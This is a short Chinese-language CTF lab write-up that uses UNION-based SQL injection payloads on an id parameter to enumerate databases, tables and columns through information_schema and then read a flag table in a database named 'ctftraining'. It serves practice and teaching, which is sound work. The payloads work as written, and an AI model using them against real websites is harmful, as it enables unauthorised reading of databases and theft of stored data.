这里就是单纯的找一下flag在哪，通关整个靶场在sql注入分区，虽然还没有通关。

这里要先看一下数据库都有哪些，用到语句：?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

发现这个数据库：ctftraining 可能有我们需要的信息

于是接着就是：

查看该数据库中都有什么表：?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),3--+

发现存在flag表，接着就是要看该表的信息：?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'),3--+

发现就只有一列，然后就是查看该列的信息：

 这里需要注意，我们要指定是ctftraining数据库的flag表，如果单纯的是flag则是查找的security.flag这时就会报错。

正确语句：?id=-1' union select 1,(select group_concat(flag) from ctftraining.flag),3--+